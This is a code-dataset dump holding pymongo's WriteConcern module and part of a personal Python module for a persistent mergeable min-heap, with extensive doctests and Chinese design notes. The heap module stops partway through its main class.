blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a6c223f868e4c11922e97249c425499dc397669a | 9baa9f1bedf7bc973f26ab37c9b3046824b80ca7 | /venv-bck/lib/python2.7/site-packages/pymongo/write_concern.py | d16f1d0b8e1ba18818c6bcc891bc21c10cae0f6b | [] | no_license | shakthydoss/suriyan | 58774fc5de1de0a9f9975c2ee3a98900e0a5dff4 | 8e39eb2e65cc6c6551fc165b422b46d598cc54b8 | refs/heads/master | 2020-04-12T05:36:59.957153 | 2017-01-08T06:12:13 | 2017-01-08T06:12:13 | 59,631,349 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,444 | py | # Copyright 2014-2015 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tools for working with write concerns."""
from bson.py3compat import integer_types, string_type
from pymongo.errors import ConfigurationError
class WriteConcern(object):
    """WriteConcern
    :Parameters:
        - `w`: (integer or string) Used with replication, write operations
          will block until they have been replicated to the specified number
          or tagged set of servers. `w=<integer>` always includes the replica
          set primary (e.g. w=3 means write to the primary and wait until
          replicated to **two** secondaries). **w=0 disables acknowledgement
          of write operations and can not be used with other write concern
          options.**
        - `wtimeout`: (integer) Used in conjunction with `w`. Specify a value
          in milliseconds to control how long to wait for write propagation
          to complete. If replication does not complete in the given
          timeframe, a timeout exception is raised.
        - `j`: If ``True`` block until write operations have been committed
          to the journal. Cannot be used in combination with `fsync`. Prior
          to MongoDB 2.6 this option was ignored if the server was running
          without journaling. Starting with MongoDB 2.6 write operations will
          fail with an exception if this option is used when the server is
          running without journaling.
        - `fsync`: If ``True`` and the server is running without journaling,
          blocks until the server has synced all data files to disk. If the
          server is running with journaling, this acts the same as the `j`
          option, blocking until write operations have been committed to the
          journal. Cannot be used in combination with `j`.
    """
    # Name-mangled slots keep the instance effectively immutable from outside.
    __slots__ = ("__document", "__acknowledged")
    def __init__(self, w=None, wtimeout=None, j=None, fsync=None):
        # Wire-format document sent to the server, built from validated options.
        self.__document = {}
        # Only w=0 (set below) makes writes unacknowledged.
        self.__acknowledged = True
        if wtimeout is not None:
            if not isinstance(wtimeout, integer_types):
                raise TypeError("wtimeout must be an integer")
            self.__document["wtimeout"] = wtimeout
        if j is not None:
            if not isinstance(j, bool):
                raise TypeError("j must be True or False")
            self.__document["j"] = j
        if fsync is not None:
            if not isinstance(fsync, bool):
                raise TypeError("fsync must be True or False")
            # j and fsync are mutually exclusive journal/disk-sync options.
            if j and fsync:
                raise ConfigurationError("Can't set both j "
                                         "and fsync at the same time")
            self.__document["fsync"] = fsync
        # w=0 disables acknowledgement entirely, so it cannot be combined
        # with any other option already collected in the document above.
        if self.__document and w == 0:
            raise ConfigurationError("Can not use w value "
                                     "of 0 with other options")
        if w is not None:
            if isinstance(w, integer_types):
                # integer w: acknowledged iff at least one node must confirm
                self.__acknowledged = w > 0
            elif not isinstance(w, string_type):
                raise TypeError("w must be an integer or string")
            self.__document["w"] = w
    @property
    def document(self):
        """The document representation of this write concern.
        .. note::
          :class:`WriteConcern` is immutable. Mutating the value of
          :attr:`document` does not mutate this :class:`WriteConcern`.
        """
        # Return a copy so callers cannot mutate internal state.
        return self.__document.copy()
    @property
    def acknowledged(self):
        """If ``True`` write operations will wait for acknowledgement before
        returning.
        """
        return self.__acknowledged
    def __repr__(self):
        return ("WriteConcern(%s)" % (
            ", ".join("%s=%s" % kvt for kvt in self.document.items()),))
    def __eq__(self, other):
        # NOTE(review): assumes `other` exposes a `document` attribute;
        # comparing against unrelated types raises AttributeError.
        return self.document == other.document
    def __ne__(self, other):
        return self.document != other.document
| [
"shakthydoss@gmail.com"
] | shakthydoss@gmail.com |
c6d53eae7e1128d46dbbb956b76c3a7d625330d0 | 13f4a06cd439f579e34bf38406a9d5647fe7a0f3 | /seed/types/MergeableHeap__immutable_tree.py | 62b0066d20d34eb16226590a2d6f29b3da608310 | [] | no_license | edt-yxz-zzd/python3_src | 43d6c2a8ef2a618f750b59e207a2806132076526 | 41f3a506feffb5f33d4559e5b69717d9bb6303c9 | refs/heads/master | 2023-05-12T01:46:28.198286 | 2023-05-01T13:46:32 | 2023-05-01T13:46:32 | 143,530,977 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 33,990 | py | #__all__:goto
#testing_________goto:goto
r'''[[[
seed.types.MergeableHeap__immutable_tree
view ../../python3_src/seed/types/MergeableHeap__immutable_tree.py
using immutable_tree underlying
O(1) copy
++unoin/merge: like eat() but donot clear() input heap
view ../../python3_src/seed/types/MergeableHeap__mutable_tree.py
just forward seed.types.MergeableHeap
e ../../python3_src/seed/types/MergeableHeap__immutable_tree.py
ver1:
view ../../python3_src/seed/types/MergeableHeap-ver1-eat-O(logM_mul_logN)-not-best.py
所有 非叶节点 含payload
eat() - O(logM*logN)
ver2:
view ../../python3_src/seed/types/MergeableHeap.py
view ../../python3_src/seed/types/MergeableHeap__mutable_tree.py
所有 二叉节点fork 含min_payload
只有 单元节点unit 含 min_payload是payload
eat() - O(logM+logN)
ver3 [当前]:
view ../../python3_src/seed/types/MergeableHeap__immutable_tree.py
using immutable_tree
[[[
===
used in:
e script/matrix_chain_product.py
e others/book/matrix_chain_product/Computation of matrix chain products I,II(1984)(Hu)(Shing)[polygon partitioning].pdf.txt
以下ver1相关,已过时[[
平衡二叉树:
左右子树 高度相差 至多为一
[min_num_nodes_of_height(h) =[def]= if h==0 then 0 else if h==1 then 1 else min_num_nodes_of_height(h-1)+min_num_nodes_of_height(h-2)+1]
[max_num_nodes_of_height(h) =[def]= if h==0 then 0 else max_num_nodes_of_height(h-1)+max_num_nodes_of_height(h-1)+1]
[max_num_nodes_of_height(h) == 2**h-1]
0,1,3,7,15,31
1,2,4,8,16,32
[min_num_nodes_of_height(h) == Fibonacci_sequence[h+2]-1]
# ~= 1.618**h * K
0,1,2,4,7,12
0,1,1,2,3,5,8,13
[min_num_nodes_of_height,max_num_nodes_of_height 都是指数增长]
高度 最多比 完美平衡树 多一半
>>> from math import log
>>> log(2)/log(1.618)
1.4404829720657013
]]
ver2[[
bug: [min_num_nodes_of_height(h) =[def]= if h==0 then 0 else if h==1 then 1 else min_num_nodes_of_height(h-1)+min_num_nodes_of_height(h-2)+1]
[min_num_nodes_of_height(h) =[def]= if h==0 then 0 else if h==1 then 1 else if h==2 then 3 else min_num_nodes_of_height(h-1)+min_num_nodes_of_height(h-2)+1]
非叶节点的数量:二叉节点+单元节点 # 不含 空叶节点
(2->3)是因为 二叉节点 的 直接子代 不是 空叶节点
0,1,3,5,9,15,25,41,67,109
see:_eat_
[min_num_payloads_of_height(h) =[def]= if h==0 then 0 else if h==1 then 1 else if h==2 then 2 else min_num_payloads_of_height(h-1)+min_num_payloads_of_height(h-2)]
实际数据的数量:单元节点
(2->2)是因为 二叉节点 的 直接子代 不含 空叶节点
0,1,2,3,5,8,13,21,34,55,89
[min_num_payloads_of_height(h) == Fibonacci_sequence[h+1] -[h==0]]
0,1,2,3,5, 8,13
0,1,1,2,3,5, 8,13
0,1,3,5,9,15,25,41,67,109
[min_num_nodes_of_height(h) == min_num_payloads_of_height(h)*2 -1 +[h==0]]
!! [num_nodes_of_height(tree) == max(0, num_payloads_of_height(tree)*2 -1)]
[min_num_nodes_of_height(h) == Fibonacci_sequence[h+1]*2 -1 -[h==0]]
[max_num_nodes_of_height(h) =[def]= if h==0 then 0 else max_num_nodes_of_height(h-1)+max_num_nodes_of_height(h-1)+1]
[max_num_payloads_of_height(h) =[def]= if h==0 then 0 else if h==1 then 1 else max_num_payloads_of_height(h-1)+max_num_payloads_of_height(h-1)]
[max_num_nodes_of_height(h) == 2**h-1]
[max_num_payloads_of_height(h) == floor(2**(h-1))]
]]
O(1)操作:
len(heap) -> size
bool(heap) -> bool
heap.peak() -> min_item
O(log(N))操作:
heap.push(item)
heap.pop() -> min_item
取出最小值
heap.merge(const& heap)
ver3[当前]:O(logN+logM)
new in ver3
heap.eat(std::move(heap))
破坏性融合
ver1:O(logN*logM)算法。比 普通情形O(N*logM)稍佳,但不及预期目标O(logN+logM)
ver2:O(logN+logM)
heap.push_then_pop(item) -> min_item
heap.pop_then_push(item) -> min_item
O(logN+M+logM)操作:
heap.pushs([item])
O(M)操作:
MergeableHeap([item])
O(N)操作:
[*iter(heap)]
非破坏性无序只读操作
heap.as_tree() -> tree=(()|(payload, tree, tree))
O(N*log(N))操作:
[*heap.iter_pops()]
破坏性有序操作
heap.to_sorted()
new in ver3
]]]
py -m nn_ns.app.debug_cmd seed.types.MergeableHeap__immutable_tree
py -m seed.types.MergeableHeap__immutable_tree
from seed.types.MergeableHeap__immutable_tree import MergeableHeap__immutable_tree, MergeableHeap, HeapError__Empty, HeapError__EatSelf, HeapError__Validate
[[[
===
>>> from seed.types.MergeableHeap__immutable_tree import MergeableHeap__immutable_tree, MergeableHeap, HeapError__Empty, HeapError__EatSelf, HeapError__Validate
>>> heap = MergeableHeap()
>>> heap
MergeableHeap()
>>> bool(heap)
False
>>> len(heap)
0
>>> [*iter(heap)]
[]
>>> [*heap.iter_pops()]
[]
>>> heap.as_tree()
()
>>> heap.verify()
>>> heap.push(999)
>>> heap.verify()
>>> heap
MergeableHeap([999])
>>> bool(heap)
True
>>> len(heap)
1
>>> [*iter(heap)]
[999]
>>> heap.as_tree()
(999, (), ())
>>> heap.peak()
999
>>> [*heap.iter_pops()]
[999]
>>> heap.peak() #doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
HeapError__Empty
>>> heap.pop() #doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
HeapError__Empty
>>> heap.eat(heap) #doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
HeapError__EatSelf
>>> heap.push(999)
>>> heap
MergeableHeap([999])
>>> heap.as_tree()
(999, (), ())
>>> heap.push(888)
>>> heap
MergeableHeap([999, 888])
>>> heap.as_tree()
(888, (999, (), ()), (888, (), ()))
>>> heap.verify()
>>> heap.push(222)
>>> heap
MergeableHeap([999, 222, 888])
>>> heap.as_tree()
(222, (222, (999, (), ()), (222, (), ())), (888, (), ()))
>>> heap.verify()
>>> heap.push(333)
>>> heap
MergeableHeap([999, 222, 888, 333])
>>> heap.as_tree()
(222, (222, (999, (), ()), (222, (), ())), (333, (888, (), ()), (333, (), ())))
>>> heap.verify()
>>> heap.push(777)
>>> heap
MergeableHeap([999, 777, 222, 888, 333])
>>> heap.as_tree()
(222, (222, (777, (999, (), ()), (777, (), ())), (222, (), ())), (333, (888, (), ()), (333, (), ())))
>>> heap.verify()
>>> heap.push(555)
>>> heap
MergeableHeap([999, 777, 222, 888, 555, 333])
>>> heap.as_tree()
(222, (222, (777, (999, (), ()), (777, (), ())), (222, (), ())), (333, (555, (888, (), ()), (555, (), ())), (333, (), ())))
>>> heap.verify()
>>> heap.push(444)
>>> heap
MergeableHeap([999, 777, 222, 444, 888, 555, 333])
>>> heap.as_tree()
(222, (222, (777, (999, (), ()), (777, (), ())), (222, (222, (), ()), (444, (), ()))), (333, (555, (888, (), ()), (555, (), ())), (333, (), ())))
>>> heap.verify()
>>> heap.push(666)
>>> heap
MergeableHeap([999, 666, 777, 222, 444, 888, 555, 333])
>>> heap.as_tree()
(222, (222, (666, (666, (999, (), ()), (666, (), ())), (777, (), ())), (222, (222, (), ()), (444, (), ()))), (333, (555, (888, (), ()), (555, (), ())), (333, (), ())))
>>> heap.verify()
>>> heap.push(111)
>>> heap
MergeableHeap([999, 666, 777, 222, 444, 888, 555, 333, 111])
>>> heap.as_tree()
(111, (222, (666, (666, (999, (), ()), (666, (), ())), (777, (), ())), (222, (222, (), ()), (444, (), ()))), (111, (555, (888, (), ()), (555, (), ())), (111, (333, (), ()), (111, (), ()))))
>>> heap.verify()
>>> bool(heap)
True
>>> len(heap)
9
>>> [*iter(heap)]
[999, 666, 777, 222, 444, 888, 555, 333, 111]
>>> heap.peak()
111
>>> heap.pop()
111
>>> heap.as_tree()
(222, (222, (666, (666, (), ()), (777, (), ())), (222, (222, (), ()), (444, (), ()))), (333, (555, (888, (), ()), (555, (), ())), (333, (333, (), ()), (999, (), ()))))
>>> heap.verify()
>>> heap.pop()
222
>>> heap.as_tree()
(333, (444, (777, (), ()), (444, (666, (), ()), (444, (), ()))), (333, (555, (888, (), ()), (555, (), ())), (333, (333, (), ()), (999, (), ()))))
>>> heap.verify()
>>> heap.pop()
333
>>> heap.as_tree()
(444, (444, (777, (), ()), (444, (), ())), (555, (555, (888, (), ()), (555, (), ())), (666, (666, (), ()), (999, (), ()))))
>>> heap.verify()
>>> heap.pop()
444
>>> heap.as_tree()
(555, (777, (777, (), ()), (888, (), ())), (555, (555, (), ()), (666, (666, (), ()), (999, (), ()))))
>>> heap.verify()
>>> heap.pop()
555
>>> heap.as_tree()
(666, (777, (777, (), ()), (888, (), ())), (666, (666, (), ()), (999, (), ())))
>>> heap.verify()
>>> heap.pop()
666
>>> heap.as_tree()
(777, (888, (), ()), (777, (777, (), ()), (999, (), ())))
>>> heap.verify()
>>> heap.pop()
777
>>> heap.as_tree()
(888, (888, (), ()), (999, (), ()))
>>> heap.verify()
>>> [*heap.iter_pops()]
[888, 999]
>>> len(heap)
0
>>> bool(heap)
False
>>> heap.as_tree()
()
>>> heap.verify()
>>> heap
MergeableHeap()
>>> heap.pushs(range(111, 1000, 111))
>>> heap.as_tree()
(111, (111, (111, (111, (), ()), (222, (), ())), (333, (333, (), ()), (444, (), ()))), (555, (555, (555, (), ()), (666, (), ())), (777, (777, (777, (), ()), (888, (), ())), (999, (), ()))))
>>> heap.verify()
>>> heap.push_then_pop(-555)
-555
>>> heap.as_tree()
(111, (111, (111, (111, (), ()), (222, (), ())), (333, (333, (), ()), (444, (), ()))), (555, (555, (555, (), ()), (666, (), ())), (777, (777, (777, (), ()), (888, (), ())), (999, (), ()))))
>>> heap.verify()
>>> heap.clear()
>>> heap.as_tree()
()
>>> heap.pushs(range(111, 1000, 111))
>>> heap.push(-555)
>>> heap.as_tree()
(-555, (-555, (-555, (-555, (111, (), ()), (-555, (), ())), (222, (), ())), (333, (333, (), ()), (444, (), ()))), (555, (555, (555, (), ()), (666, (), ())), (777, (777, (777, (), ()), (888, (), ())), (999, (), ()))))
>>> heap.verify()
>>> heap.pop()
-555
>>> heap.as_tree()
(111, (111, (111, (111, (), ()), (222, (), ())), (333, (333, (), ()), (444, (), ()))), (555, (555, (555, (), ()), (666, (), ())), (777, (777, (777, (), ()), (888, (), ())), (999, (), ()))))
>>> heap.verify()
>>> heap.clear()
>>> heap.as_tree()
()
>>> heap.pushs(range(999, 100, -111))
>>> heap.as_tree()
(111, (666, (888, (999, (), ()), (888, (), ())), (666, (777, (), ()), (666, (), ()))), (111, (444, (555, (), ()), (444, (), ())), (111, (222, (333, (), ()), (222, (), ())), (111, (), ()))))
>>> heap.verify()
>>> heap.pop_then_push(-555)
111
>>> heap.as_tree()
(-555, (666, (888, (999, (), ()), (888, (), ())), (666, (777, (), ()), (666, (), ()))), (-555, (444, (555, (), ()), (444, (), ())), (-555, (222, (333, (), ()), (222, (), ())), (-555, (), ()))))
>>> heap.verify()
>>> heap.clear()
>>> heap.as_tree()
()
>>> heap.pushs(range(999, 100, -111))
>>> heap.as_tree()
(111, (666, (888, (999, (), ()), (888, (), ())), (666, (777, (), ()), (666, (), ()))), (111, (444, (555, (), ()), (444, (), ())), (111, (222, (333, (), ()), (222, (), ())), (111, (), ()))))
>>> heap.pop()
111
>>> heap.as_tree()
(222, (666, (888, (999, (), ()), (888, (), ())), (666, (777, (), ()), (666, (), ()))), (222, (444, (555, (), ()), (444, (), ())), (222, (222, (), ()), (333, (), ()))))
>>> heap.verify()
>>> heap.push(-555)
>>> heap.as_tree()
(-555, (-555, (-555, (-555, (999, (), ()), (-555, (), ())), (888, (), ())), (666, (777, (), ()), (666, (), ()))), (222, (444, (555, (), ()), (444, (), ())), (222, (222, (), ()), (333, (), ()))))
>>> heap.verify()
>>> heap.clear()
>>> heap.pushs(range(111, 1000, 111))
>>> heap.pop_then_push(700)
111
>>> heap.as_tree()
(222, (222, (222, (700, (), ()), (222, (), ())), (333, (333, (), ()), (444, (), ()))), (555, (555, (555, (), ()), (666, (), ())), (777, (777, (777, (), ()), (888, (), ())), (999, (), ()))))
>>> heap.verify()
>>> heap.push_then_pop(400)
222
>>> heap.as_tree()
(333, (333, (400, (700, (), ()), (400, (), ())), (333, (333, (), ()), (444, (), ()))), (555, (555, (555, (), ()), (666, (), ())), (777, (777, (777, (), ()), (888, (), ())), (999, (), ()))))
>>> heap.verify()
>>> heap.clear()
>>> heap.pushs(range(111, 1000, 111))
>>> heap2 = MergeableHeap(range(99, 10, -11))
>>> heap.as_tree()
(111, (111, (111, (111, (), ()), (222, (), ())), (333, (333, (), ()), (444, (), ()))), (555, (555, (555, (), ()), (666, (), ())), (777, (777, (777, (), ()), (888, (), ())), (999, (), ()))))
>>> heap2.as_tree()
(11, (66, (88, (99, (), ()), (88, (), ())), (66, (77, (), ()), (66, (), ()))), (11, (44, (55, (), ()), (44, (), ())), (11, (22, (33, (), ()), (22, (), ())), (11, (), ()))))
>>> heap.eat(heap2)
>>> heap2.as_tree()
()
>>> heap.as_tree()
(11, (111, (111, (111, (111, (), ()), (222, (), ())), (333, (333, (), ()), (444, (), ()))), (555, (555, (555, (), ()), (666, (), ())), (777, (777, (777, (), ()), (888, (), ())), (999, (), ())))), (11, (66, (88, (99, (), ()), (88, (), ())), (66, (77, (), ()), (66, (), ()))), (11, (44, (55, (), ()), (44, (), ())), (11, (22, (33, (), ()), (22, (), ())), (11, (), ())))))
>>> heap.verify()
>>> heap.clear()
>>> heap.pushs(range(111, 1000, 111))
>>> heap2 = MergeableHeap(range(44, 10, -11))
>>> heap2.as_tree()
(11, (33, (44, (), ()), (33, (), ())), (11, (22, (), ()), (11, (), ())))
>>> heap.eat(heap2)
>>> heap2.as_tree()
()
>>> heap.as_tree()
(11, (11, (111, (111, (111, (), ()), (222, (), ())), (333, (333, (), ()), (444, (), ()))), (11, (33, (44, (), ()), (33, (), ())), (11, (22, (), ()), (11, (), ())))), (555, (555, (555, (), ()), (666, (), ())), (777, (777, (777, (), ()), (888, (), ())), (999, (), ()))))
>>> heap.verify()
>>> heap.clear()
>>> heap.pushs(range(111, 500, 111))
>>> heap2 = MergeableHeap(range(88, 10, -11))
>>> heap.as_tree()
(111, (111, (111, (), ()), (222, (), ())), (333, (333, (), ()), (444, (), ())))
>>> heap2.as_tree()
(11, (55, (77, (88, (), ()), (77, (), ())), (55, (66, (), ()), (55, (), ()))), (11, (33, (44, (), ()), (33, (), ())), (11, (22, (), ()), (11, (), ()))))
>>> heap.eat(heap2)
>>> heap2.as_tree()
()
>>> heap.as_tree()
(11, (55, (55, (77, (88, (), ()), (77, (), ())), (55, (66, (), ()), (55, (), ()))), (111, (111, (111, (), ()), (222, (), ())), (333, (333, (), ()), (444, (), ())))), (11, (33, (44, (), ()), (33, (), ())), (11, (22, (), ()), (11, (), ()))))
>>> heap.verify()
>>> heap = MergeableHeap(key=len)
>>> heap.push({1,2,3})
>>> heap.push(range(100))
>>> heap.peak()
{1, 2, 3}
>>> heap.verify()
>>> heap = MergeableHeap(key=len, __lt__=opss.__gt__)
>>> heap.push({1,2,3})
>>> heap.push(range(100))
>>> heap.peak()
range(0, 100)
>>> heap.verify()
>>> heap = MergeableHeap(key=len, __lt__=opss.__gt__, reverse=True)
>>> heap.push({1,2,3})
>>> heap.push(range(100))
>>> heap.peak()
{1, 2, 3}
>>> heap.verify()
>>> heap = MergeableHeap([1, 2, 3])
>>> heap
MergeableHeap([1, 2, 3])
>>> heap.merge(heap)
>>> heap
MergeableHeap([1, 2, 3, 1, 2, 3])
>>> heap.verify()
>>> heap2 = MergeableHeap([4, 5, 6])
>>> heap2
MergeableHeap([4, 5, 6])
>>> heap | heap2
MergeableHeap([1, 2, 3, 4, 5, 6, 1, 2, 3])
>>> heap
MergeableHeap([1, 2, 3, 1, 2, 3])
>>> heap2
MergeableHeap([4, 5, 6])
>>> heap.verify()
>>> heap.merge(heap2)
>>> heap
MergeableHeap([1, 2, 3, 4, 5, 6, 1, 2, 3])
>>> heap2
MergeableHeap([4, 5, 6])
>>> heap.verify()
testing_________goto
#]]]'''
r'''[[[
]]]
#]]]'''
__all__ = '''
MergeableHeap__immutable_tree
MergeableHeap
HeapError__Empty
HeapError__EatSelf
HeapError__Validate
'''.split()
import operator as opss
from itertools import pairwise
from seed.tiny import echo, null_tuple
from seed.helper.repr_input import repr_helper
from collections import namedtuple
class _MHNodeEmpty:
    '''Sentinel node type for an empty (sub)tree.

    A single shared instance (`_empty_node`) represents every empty
    leaf; it only carries the degenerate shape data (height 0, size 0)
    and the node-kind flags.
    '''
    __slots__ = ()
    # node-kind flags: this is the (only) empty kind
    is_empty, is_unit, is_fork = True, False, False
    # degenerate shape of the empty tree
    height = size = 0
#the one shared empty-leaf instance
_empty_node = _MHNodeEmpty()
# Fork (binary interior) node: payload-free; caches the subtree's
# minimum payload plus its shape (height, size).
_MHNode = namedtuple('_MHNode', '''
    min_payload
    lhs_child
    rhs_child
    height
    size
'''.split()
)
class _MHNode(_MHNode):
    '''Immutable binary fork node of the heap tree.

    `__new__` takes the node comparator `_lt__node` and the two children;
    `min_payload`, `height` and `size` are derived automatically.
    '''
    __slots__ = ()
    # node-kind flags
    is_empty = False
    is_unit = False
    is_fork = True
    # disable the sequence protocol inherited from tuple
    __iter__ = None
    __len__ = None
    __bool__ = None
    __getitem__ = None
    def __new__(cls, _lt__node, lhs_child, rhs_child, /):
        # validate the children, then derive the cached fields from them
        cls.check_args(lhs_child, rhs_child)
        (height, size) = cls.prepare_auto_args__shape(lhs_child, rhs_child)
        min_payload = cls.prepare_auto_arg__min_payload(_lt__node, lhs_child, rhs_child)
        sf = super(__class__, cls).__new__(cls, min_payload, lhs_child, rhs_child, height, size)
        return sf
    @classmethod
    def check_args(cls, lhs_child, rhs_child, /):
        # children must be non-empty nodes whose heights differ by <= 1
        assert isinstance(lhs_child, _MHNodeChildTypes)
        assert isinstance(rhs_child, _MHNodeChildTypes)
        assert abs(lhs_child.height - rhs_child.height) <= 1
        assert min(lhs_child.height, rhs_child.height) >= 1
    @classmethod
    def prepare_auto_args__shape(cls, lhs_child, rhs_child, /):
        # the fork's shape follows directly from the children's shapes
        height = 1+max(lhs_child.height, rhs_child.height)
        size = lhs_child.size + rhs_child.size
        return (height, size)
    @classmethod
    def prepare_auto_arg__min_payload(cls, _lt__node, lhs_child, rhs_child, /):
        # cache the smaller child's min_payload (ties keep the lhs one)
        min_child = rhs_child if _lt__node(rhs_child, lhs_child) else lhs_child
        min_payload = min_child.min_payload
        return min_payload
    @property
    def children(sf, /):
        return (sf.lhs_child, sf.rhs_child)
    @property
    def sorted_children_by_height(sf, /):
        return sorted(sf.children, key=_get_height4node)
    @property
    def large_child(sf, /):
        'giant'
        # the taller child (max keeps the first, i.e. lhs, on ties)
        return max(sf.children, key=_get_height4node)
    @property
    def small_child(sf, /):
        'dwarf'
        return min(sf.children, key=_get_height4node)
    @property
    def the_min_payload_child(sf, /):
        # the child whose min_payload is (identically) the cached one
        for child in sf.children:
            if sf.min_payload is child.min_payload:
                break
        else:
            # unreachable while the heap invariant holds; `logic-err`
            # deliberately raises NameError as an internal-error marker
            raise logic-err
        return child
    def another_child_of(sf, old_child, /):
        # sibling of `old_child`, matched by identity
        if sf.lhs_child is old_child:
            return sf.rhs_child
        elif sf.rhs_child is old_child:
            return sf.lhs_child
        else:
            raise logic-err
def _get_height4node(node, /):
    'key function for sorted/min/max: the height of a heap-tree node'
    return getattr(node, 'height')
# Unit (leaf) node: holds exactly one payload; fixed height 1, size 1.
_MHNodeUnit = namedtuple('_MHNodeUnit', '''
    payload
'''.split()
)
class _MHNodeUnit(_MHNodeUnit):
    '''Immutable leaf node — the only node kind that stores a payload.'''
    __slots__ = ()
    is_empty = False
    is_unit = True
    is_fork = False
    #crotch fork
    # both children are the shared empty sentinel
    lhs_child = _empty_node
    rhs_child = _empty_node
    height = 1
    size = 1
    # disable the sequence protocol inherited from tuple
    __iter__ = None
    __len__ = None
    __bool__ = None
    __getitem__ = None
    @property
    def min_payload(sf, /):
        # a leaf's minimum is its own payload
        return sf.payload
    # class-level constants (same for every unit node)
    children = (_empty_node,)*2
    sorted_children_by_height = children
    small_child, large_child = sorted_children_by_height
    #no:the_min_payload_child
# isinstance() tuples: all node kinds / kinds allowed as fork children
_MHNodeTypes = (_MHNode, _MHNodeUnit, _MHNodeEmpty)
_MHNodeChildTypes = (_MHNode, _MHNodeUnit)
# drop the class name; the singleton `_empty_node` keeps the type alive
del _MHNodeEmpty
class HeapError__Empty(Exception):
    '''raised by peak()/pop() on an empty heap'''

class HeapError__EatSelf(Exception):
    '''raised when a heap is asked to destructively eat() itself'''

class HeapError__Validate(Exception):
    '''raised by verify() when a structural invariant is violated'''
class _MergeableHeap__mixin:
    '''Query/comparison operations shared by the two heap front-ends.

    Subclasses must provide the state/configuration properties:
    `_node` (root tree node), `_key_func`, `_lt`, `_reverse`.
    '''
    __slots__ = ()
    def verify(sf, /):
        '''Check every structural invariant of the whole tree.
        raise HeapError__Validate on the first violation.'''
        for node in _unorder_iter_nodes5root(sf._node):
            sf._verify__node(node)
    def _verify__node(sf, node, /):
        if not node.is_empty:
            # shape invariants: each child sits 1..2 levels below, at least
            # one child exactly 1 below, sibling heights differ by <= 1
            if not all(1 <= node.height-child.height <= 2 for child in node.children): raise HeapError__Validate
            if not any(node.height-child.height == 1 for child in node.children): raise HeapError__Validate
            if not abs(node.lhs_child.height-node.rhs_child.height) <= 1: raise HeapError__Validate
            if node.is_fork:
                # heap invariants: cached min_payload is <= both children's
                # minima and is identically one of the children's minima
                if any(sf._lt__node(child, node) for child in node.children): raise HeapError__Validate
                if not any(node.min_payload is child.min_payload for child in node.children): raise HeapError__Validate
    def __bool__(sf, /):
        'True iff the heap holds at least one payload; O(1)'
        return not (sf._node.is_empty)
    def __len__(sf, /):
        'number of payloads; O(1)'
        return (sf._node.size)
    def as_tree(sf, /):
        'tree=(()|(payload, tree, tree))'
        return _node_as_tree(sf._node)
    def __iter__(sf, /):
        'unorder iter'
        return _unorder_iter_payloads5root(sf._node)
    def __repr__(sf, /):
        # include only non-default configuration so the repr stays terse
        kwargs = {}
        if not sf._key_func is echo:
            kwargs.update(key=sf._key_func)
        if not sf._lt is opss.__lt__:
            kwargs.update(__lt__=sf._lt)
        if not sf._reverse is False:
            kwargs.update(reverse=sf._reverse)
        iterable = [*sf]
        args = [iterable] if iterable else []
        return repr_helper(sf, *args, **kwargs)
    def peak(sf, /):
        '''Return (without removing) the minimum payload; O(1).
        raise HeapError__Empty on an empty heap.'''
        if not sf:
            raise HeapError__Empty
        return sf._node.min_payload
    def _lt__node(sf, lhs_node, rhs_node, /):
        # strict less-than on nodes via their cached minimum payloads
        assert not lhs_node.is_empty
        assert not rhs_node.is_empty
        return sf._lt__payload(lhs_node.min_payload, rhs_node.min_payload)
        # NOTE(review): removed unreachable legacy fallback (dead code
        # after the return) that ordered _empty_node as +oo; it belonged
        # to a retired `_pushdown_payload_at_root` variant, and empty
        # nodes are now rejected by the asserts above.
    def _lt__payload(sf, lhs_payload, rhs_payload, /):
        # reverse=True flips the operand order; key/__lt__ set the order
        if sf._reverse:
            lhs_payload, rhs_payload = rhs_payload, lhs_payload
        return sf._lt(sf._key_func(lhs_payload), sf._key_func(rhs_payload))
#end-class _MergeableHeap__mixin:
# NOTE: namedtuple field names may not begin with an underscore
# (ValueError: Field names cannot start with an underscore: '_key_func'),
# so the fields carry an 'X' prefix; the subclass defined below
# re-exposes them through the intended underscore-named properties
# (_key_func, _lt, _reverse, _node).
MergeableHeap__immutable_tree = namedtuple('MergeableHeap__immutable_tree', '''
    Xkey_func
    Xlt
    Xreverse
    Xnode
'''.split()
)
class MergeableHeap__immutable_tree(MergeableHeap__immutable_tree, _MergeableHeap__mixin):
    '''Persistent (immutable) mergeable min-heap.

    Shadows the namedtuple of the same name defined just above.  Every
    "i"-prefixed operation returns a pair `(new_heap, result)` instead of
    mutating in place, which makes `copy()` O(1).
    '''
    __slots__ = ()
    def __new__(cls, iterable=None, /, *, key=None, __lt__=None, reverse=False):
        # normalize the ordering configuration (defaults: identity key,
        # operator.__lt__, not reversed)
        _key_func = echo if key is None else key
        _lt = opss.__lt__ if __lt__ is None else __lt__
        _reverse = bool(reverse)
        #==>> __repr__, eat, _lt__payload
        _node = _empty_node
